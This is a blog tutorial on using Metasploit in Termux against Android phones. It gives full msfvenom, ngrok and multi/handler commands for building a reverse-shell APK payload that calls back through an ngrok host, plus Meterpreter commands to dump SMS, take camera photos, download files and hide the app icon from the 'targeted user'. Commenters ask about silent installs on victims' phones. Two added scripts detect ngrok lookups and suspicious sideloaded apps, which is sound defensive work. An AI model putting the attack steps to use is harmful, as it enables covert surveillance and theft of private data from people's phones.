Use Metasploit in Termux

Hey everyone, in this post, we're diving into how to test the security of Android phones using Termux and Metasploit. We want to show you how these tools can be used to see if your Android device is secure. We'll walk you through the steps, so you can try it out yourself. Just follow the commands we give you in the Termux app. This way, you'll get hands-on experience and learn more about keeping your mobile devices safe and sound.

Important Note: The content of this post is intended solely for educational purposes. Neither I nor this website endorse or condone any illegal activities. It's crucial to utilize the information provided here responsibly and within legal boundaries. We advocate for the responsible use of technology and emphasize the importance of ethical behavior in cybersecurity practices.

Requirements:

  1. Termux: If you want to know about Termux in detail, see [What is Termux? | Download Termux]
  2. Metasploit: If you don't have Metasploit in your Termux, see [Install Metasploit in Termux]


Port Forwarding using Ngrok in termux:

If you're planning to use Metasploit on a local network (LAN), feel free to skip this step. This step becomes necessary when you and your target are not on the same Wi-Fi network.

Port forwarding allows us to reach the target phone over mobile data. This is particularly useful if you're using a SIM card, so port forwarding is essential to use Metasploit effectively in such scenarios.


Step 1:

Go to Ngrok.com and create an account. If you already have an account at ngrok, log in.

Step 2:

Download the Ngrok zip file on your phone. It will be approximately a 12 MB file.

Step 3:

Now you will see the zip file that you downloaded from the Ngrok website.
Open Termux and navigate to that zip file. If it's not in your download folder or you can't see your download folder, just open the file manager and paste the zip file into your internal storage, then go to Termux and run cd storage.

Step 4:
Type this command to copy the zip file to the home directory of Termux.
cp ngrok-stable-linux-arm.zip "$HOME"

Step 5:
Type this command to go back to your home directory.
cd "$HOME"




Step 6:
Type this command to unzip the file.
unzip ngrok-stable-linux-arm.zip

Step 7:

Go to the Ngrok site again and copy the token (please copy the full token).

Step 8:

Open the terminal, type this command followed by your token, and press Enter.
./ngrok authtoken <your-authtoken>

Step 9:

Type this command to start port forwarding on port 1275.
./ngrok tcp 1275
You can use any port number; I am using 1275 here.

Step 10:
If you also get this error, just turn on your hotspot and it will be fixed in 30 to 60 seconds.

Create payload in Metasploit:

The payload will be an APK file, which we are going to install on our second phone to test the Metasploit tool. It will allow us to access the second Android phone.


Step 1:

Open a new session in Termux (just swipe your screen from left to right and tap New session). Please make sure Termux has storage permission. Type the command below if you don't have the storage permission.
termux-setup-storage
Allow storage permission.








Step 2:
Type this command to create a payload and press Enter.

Please change your LHOST and LPORT as given in the below image.

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

Step 3:
Go to your internal storage and you will see Android.apk.
Install this APK on the second phone.
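
The payload above calls back to an ngrok TCP endpoint (0.tcp.ngrok.io in the command), so DNS logs are one place a defender can spot it. The script below is an added example, not part of the original post: the log format, client addresses and function names are constructed, and matching regional hostnames such as 4.tcp.eu.ngrok.io generalizes beyond the single hostname shown on this page.

```shell
#!/bin/sh
# Added example: flag DNS lookups for ngrok TCP tunnel endpoints.
# Assumed log format (constructed): "<ISO time> <client IP> <queried name>"

# Print "<client> <name> <count>" for each client/name pair whose queried
# name is an ngrok TCP endpoint, e.g. 0.tcp.ngrok.io or 4.tcp.eu.ngrok.io.
flag_ngrok_tcp() {
    awk '
        {
            name = tolower($3)
            sub(/\.$/, "", name)   # drop a trailing root dot
            # Anchored at both ends so look-alike names do not match.
            if (name ~ /^[0-9]+\.tcp(\.[a-z0-9-]+)?\.ngrok\.io$/)
                hits[$2 " " name]++
        }
        END { for (k in hits) print k, hits[k] }
    ' | sort
}

# Constructed sample log (documentation addresses, not real traffic).
sample_dns_log() {
    cat <<'EOF'
2024-01-01T10:00:01Z 192.0.2.10 www.example.com
2024-01-01T10:00:05Z 192.0.2.23 0.tcp.ngrok.io
2024-01-01T10:00:35Z 192.0.2.23 0.TCP.ngrok.io.
2024-01-01T10:01:02Z 192.0.2.10 0.tcp.ngrok.io.example.net
2024-01-01T10:01:30Z 192.0.2.41 4.tcp.eu.ngrok.io
2024-01-01T10:02:00Z 192.0.2.10 tcp.ngrok.io
EOF
}

sample_dns_log | flag_ngrok_tcp
```

A phone that repeatedly resolves one of these names without any developer tooling installed is worth a closer look at its installed apps.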


Start Listener (msfconsole): 

Step 1:

Type this command in the Termux window to start msfconsole.
msfconsole
It can take up to 30 seconds to start.

Step 2:

Type this command to start the Multi handler in Metasploit.
use exploit/multi/handler


Step 3:
Type this command to set the payload.
set payload android/meterpreter/reverse_tcp 

Step 4:
Now set the LHOST on which you want to listen for the session.
If you are using ngrok port forwarding, enter this IP address; if you are not using port forwarding, enter your local IP.
set LHOST 127.0.0.1

Step 5:
Now set the LPORT.
If you are using Ngrok, set the same port that you used for port forwarding.
If you are not using port forwarding, just enter the same port you used to create the payload.
set LPORT 1275 

Step 6:
This is the last command and the phone will be hacked.
exploit
It will connect to the second phone and give you a Meterpreter session.

Some useful commands in Meterpreter.

Find all the commands available:

This command will give you a list of commands and a short description of each command.
help 


Get SMS from the second phone to your phone:

This command will give you the most recent 50 SMS from the second phone.
dump_sms
You will get a text file that contains all the SMS with details; just use the cat command to open the file.

Hide the icon of the Apk you send to the second phone:

If you are installing an app on the targeted device, it's apparent that the user will likely notice the new app and may decide to uninstall it. To prevent detection, you can use the below command to hide the app icon from the targeted phone.
hide_app_icon



Change the audio mode:

You can set the phone to general mode by using the below command.
set_audio_mode -m 1
You can type set_audio_mode -m 0 to silence the phone.



Capture pictures:
This command will capture a photo from the second phone's camera and send it to your storage folder.
webcam_snap


Access file storage:
You can navigate to the second phone's files and see all the data in any folder.
cd /sdcard
You can type the ls command to show directories. If you want to know about the basic commands of Termux, read this post.



Download any file:
Navigate to the file you want to download and type this command.
download file-name
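
Because hide_app_icon removes the launcher icon, the installed-app list is where such a payload shows up on the phone. The script below is an added example, not part of the original post: the inventory format, package names and trusted-installer list are constructed assumptions, and it assumes the commands above need SMS, camera and storage permissions (on a real device the installer column can be collected with `pm list packages -3 -i`).

```shell
#!/bin/sh
# Added example: triage an app inventory for sideloaded apps that hold the
# kind of access the commands above rely on (SMS, camera, storage).
# Constructed input, one app per line:
#   <package> <installer|null> <launcher icon: yes|no> <comma-separated perms>

TRUSTED_INSTALLERS="com.android.vending"   # assumption: Play Store only

audit_apps() {
    awk -v trusted="$TRUSTED_INSTALLERS" '
        BEGIN {
            n = split(trusted, t, ",")
            for (i = 1; i <= n; i++) ok[t[i]] = 1
            sens["android.permission.READ_SMS"] = "sms"
            sens["android.permission.CAMERA"] = "camera"
            sens["android.permission.READ_EXTERNAL_STORAGE"] = "storage"
        }
        {
            if ($2 in ok) next             # installed by a trusted store
            found = ""; count = 0
            m = split($4, p, ",")
            for (i = 1; i <= m; i++)
                if (p[i] in sens) {
                    found = (count ? found "+" : "") sens[p[i]]
                    count++
                }
            if (count < 2) next            # one sensitive permission is common
            print $1, "untrusted-installer", ($3 == "no" ? "no-icon" : "icon"), found
        }
    '
}

# Constructed sample inventory (package names are placeholders).
sample_inventory() {
    cat <<'EOF'
com.example.notes com.android.vending yes android.permission.CAMERA,android.permission.READ_SMS
com.example.updater null no android.permission.INTERNET,android.permission.READ_SMS,android.permission.CAMERA,android.permission.READ_EXTERNAL_STORAGE
com.example.game null yes android.permission.INTERNET
com.example.scanner com.example.store yes android.permission.CAMERA,android.permission.READ_EXTERNAL_STORAGE
EOF
}

sample_inventory | audit_apps
```

The no-icon result is the one to prioritize; the second hit comes from an alternative store and needs a manual look before any conclusion.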

CONCLUSION:

Now that you have a Meterpreter session, you have gained access to the testing phone. However, in some scenarios, if the targeted user deletes the app, you'll lose access to the phone. If you're interested in maintaining access even if the app is removed or if the phone is restarted, check out [How to Hide app icon and create a persistent payload in Metasploit]. Feel free to ask any questions in the comments. Thank you for reading, and remember to always prioritize ethical behavior. 👾

47 Comments

  1. Hello, if I close my terminal, how do I get connected back to the device?

  2. You just have to follow the steps below
    Start Listener (msfconsole):

  3. Will ngrok still be connected if I close my terminal??

  4. Is it possible to stay connected with the victim's mobile after disconnecting ngrok?

  5. It's important to install Metasploit first

  6. Pratik More
    Can you do Instagram bruteforce from Termux?

  7. Any auto install apk for victims

    Replies
    1. He means, can we install the APK payload without their notice?

  8. That was awesome, keep it up

  9. How to hack not installing apk, send a link to hack

  10. Nice, I will try it, but I didn't get you when you said that I have to change LHOST and LPORT. How do you change them?

  11. Can we make the APK with a different icon and name?

  12. If I close all those, is there any way to reconnect with the victim?

  13. When I type CD downloads / then it comes out like this: bash: cd: too many arguments
    help me out

  14. Sir, please make a video on it, it's not clear with this at all, and I know this is working but it's actually hard, plz help sir.

  15. Plz help me, my exploit is not working

  16. How to navigate to the zip file in Termux?

  17. Meterpreter session 1 closed reason died bro help me

  18. How do we install the app on the victim's phone?! Do we need to install it manually, or can we install it by any command or by sending him/her the link?

  19. Nice and simple tutorial....Thanks man...You are the best😅

  20. Someone tried this on me. I have uninstalled the app from my phone.. Is my phone safe now or should I reset it?

    Replies
    1. It's safe, just reboot your phone one time and done.

  21. My ngrok doesn't have any LPORT address, how can I get my LPORT number....?